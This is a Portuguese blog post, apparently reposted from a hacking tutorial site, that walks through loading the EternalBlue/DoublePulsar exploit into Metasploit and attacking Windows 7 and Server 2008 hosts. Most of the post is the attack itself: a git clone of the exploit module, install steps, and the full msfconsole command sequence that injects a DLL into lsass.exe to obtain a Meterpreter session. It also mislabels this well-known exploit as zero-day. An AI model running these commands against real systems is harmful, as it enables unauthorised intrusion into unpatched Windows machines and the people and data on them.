WWW.FLEPS.COM.BR

Explore o Windows Remote PC com o Eternalblue & Doublepulsar Exploit no Metasploit

By admin at 2019-04-01 • 0 colecionador • 817 visualizações de página

Através deste artigo, estamos compartilhando o recente exploit de dia-zero, que requer que o framework Metasploit ative qualquer outro sistema baseado em Windows. Este exploit é uma combinação de duas ferramentas "Eternal Blue", que é útil como um backdoor no Windows e "Doublepulsar", que é usado para injetar o arquivo DLL com a ajuda da carga útil. Então vamos adicionar manualmente este exploit no framework Metasploit e avançar para atacar o servidor de janelas 2008.

Atacante: Kali Linux

Destino: Windows 7 e Windows Server 2008

Vamos começar!

Abra o terminal no Kali Linux e digite o seguinte comando para baixar este exploit do hub git.


git clone //github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit.git



Uma vez que o exploit requerido será baixado, abra a pasta e copie o arquivo Eternal Blue-Doublepulsar .rbpara que possamos incluir este exploit dentro do Metasploit.



Agora passando o arquivo ruby copiado dentro do caminho dado Usr / share / metasploit Framework / módulo / exploits / windows / smb que irá adicionar este exploit dentro do framework Metasploit.



Em seguida, carregue o framework Metasploit para iniciar e digitar o seguinte para testar a exploração de dia zero

msfconsole

Este módulo explora a vulnerabilidade dos protocolos SMBv1 e SMBv2 através do eternalblue. Depois disso, o doublepulsar é usado para injetar remotamente uma DLL maliciosa.

use windows/smb/eternalblue_doublepulsar

msf exploit (eternalblue_doublepulsar)> set eternalbluepath /root/Desktop/eternalblue_doublepulsar-metasploit/deps

msf exploit (eternalblue_doublepulsar)> set doublepulsarpath /root/Desktop/eternalblue_doublepulsar-metasploit/deps

msf exploit (eternalblue_doublepulsar)>set targetarchitecture x64

msf exploit (eternalblue_doublepulsar)>set processinject lsass.exe

msf exploit (eternalblue_doublepulsar)>set lhost 192.168.1.6

msf exploit (eternalblue_doublepulsar)>set rhost 192.168.1.104

msf exploit (eternalblue_doublepulsar)>exploit


Assim, a partir da captura de tela, você pode observar apenas que precisamos definir a arquitetura e o IP do alvo antes de iniciar a exploração e, quando todas as informações estiverem definidas, lançaremos o ataque que lhe dará a sessão do medidor com êxito.





Autor : Aarti Singh é pesquisador e redator técnico da Hacking Articles, um consultor de segurança da informação, amante de mídias sociais e gadgets.

fonte:<https://www.hackingarticles.in/exploit-remote-windows-pc-eternalblue-doublepulsar-exploit-metasploit/>

Requer login

Loading...
:79::65::p:78::57:;):77::51::D:76:
:2::icon_syria_lovely::o:75::1::):clap::71::(:70: